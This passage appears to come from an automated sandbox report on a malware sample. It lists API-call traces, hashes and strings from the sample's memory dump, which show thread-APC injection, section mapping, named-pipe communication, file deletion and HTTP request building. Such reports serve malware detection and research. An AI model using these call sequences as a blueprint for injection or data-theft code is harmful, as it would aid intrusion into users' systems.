    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 37
  • API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey
  • String ID:
  • API String ID: 3176510729-0
  • Opcode ID: c06c93110e7f7b91b8af1b73fb1b0b90ed9f89153cfcabb1f297ed8ce1865d6a
  • Instruction ID: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
  • Opcode Fuzzy Hash: CCF097B98604C18EC212342048796E6BB04AF400C5A9C1762FE94042826F1531673B96
  • Instruction Fuzzy Hash: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
APIs
  • RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
  • RegCloseKey.ADVAPI32(?), ref: 001DF4EE
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
  • GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
  • GetLastError.KERNEL32 ref: 001DF4BC
  • FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
  • GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 75
  • API ID: GetLastError$CloseHandleCreateFileCreateFileMappingGetFileSizeGetTickCountHeapFreelstrcpylstrlen
  • String ID: Local\
  • API String ID: 100657750-422136742
  • Opcode ID: f69422c415cb778fefbc06e8825fe91035b8cc03ac1a89af78bf0cef88205365
  • Instruction ID: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
  • Opcode Fuzzy Hash: 99F02E34B1854287E12374A1016077FDA04E7F20C4D8C7767ED453950A6F0278F7661B
  • Instruction Fuzzy Hash: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
APIs
  • GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
  • CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
    • Part of subcall function 001D937A: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,001EB068,00000000), ref: 001D93B0
    • Part of subcall function 001D937A: lstrcpy.KERNEL32(00000000,00000000), ref: 001D93D4
    • Part of subcall function 001D937A: lstrcat.KERNEL32(00000000,00000000), ref: 001D93DC
  • GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
  • CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
  • lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
  • lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
  • HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
  • CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
